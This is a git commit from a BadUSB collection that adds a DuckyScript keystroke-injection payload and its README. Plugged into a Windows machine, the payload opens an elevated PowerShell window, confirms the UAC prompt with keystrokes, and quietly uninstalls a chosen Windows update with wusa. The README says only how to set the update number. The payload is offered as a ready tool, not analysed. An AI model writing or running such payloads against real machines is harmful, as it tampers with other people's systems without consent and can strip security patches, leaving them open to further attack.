Adding lost UNC0V3R3D BadUSB Collection

This commit is contained in:
UberGuidoZ
2024-04-15 23:47:39 -07:00
parent 06c3423537
commit 103d83bf76
155 changed files with 5841 additions and 0 deletions
@@ -0,0 +1,21 @@
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Remove any Windows Update. Please put in the update number you want to remove. Example: KB27475
REM Version: 1.0
REM Category: Execution
DELAY 750
WINDOWS d
DELAY 1500
WINDOWS r
DELAY 1500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 750
LEFTARROW
ENTER
DELAY 1500
ALT y
DELAY 1500
GUI UP
DELAY 1500
STRING $input="UPDATE NUMBER";$input = $input.Replace('KB', '');$cmdString = 'wusa /quiet /norestart /uninstall /kb:' + $input;Invoke-Expression -Command $cmdString; exit
ENTER
@@ -0,0 +1,44 @@
# RemoveWindowsUpdate
This script uninstalls a Windows update that has been previously installed on the system.
## How to use?
This script is not plug and play. You will have to do the following changes:
- change update number "$input="UPDATE NUMBER""
## Features
- open powershell
- find update by number
- uninstall update
## Feedback
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
## Support
For support, contact me via Discord "UNC0V3R3D#8662".
## Meta
- If you want to sponsor me on Patreon, the link is on my profile.